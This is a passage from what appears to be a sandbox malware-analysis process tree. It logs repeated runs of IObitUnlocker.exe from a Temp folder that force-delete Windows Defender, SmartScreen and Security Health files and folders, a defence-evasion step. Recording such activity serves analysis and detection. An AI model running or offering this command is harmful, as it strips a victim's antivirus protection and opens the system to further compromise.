                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                            10⤵
                                                            • System Location Discovery: System Language Discovery
                                                            PID:3848
                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                            10⤵
                                                              PID:4404
                                                            • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                              C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                              10⤵
                                                                PID:3436
                                                              • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                10⤵
                                                                • System Location Discovery: System Language Discovery
                                                                PID:3620
                                                              • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                10⤵
                                                                  PID:2280
                                                                • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                  C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                  10⤵
                                                                    PID:2484
                                                                  • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                    C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                    10⤵
                                                                      PID:424
                                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                      10⤵
                                                                        PID:4080
                                                                      • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                        10⤵
                                                                          PID:2800
                                                                        • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                          C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                          10⤵
                                                                            PID:2756
                                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                            10⤵
                                                                              PID:5764
                                                                            • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
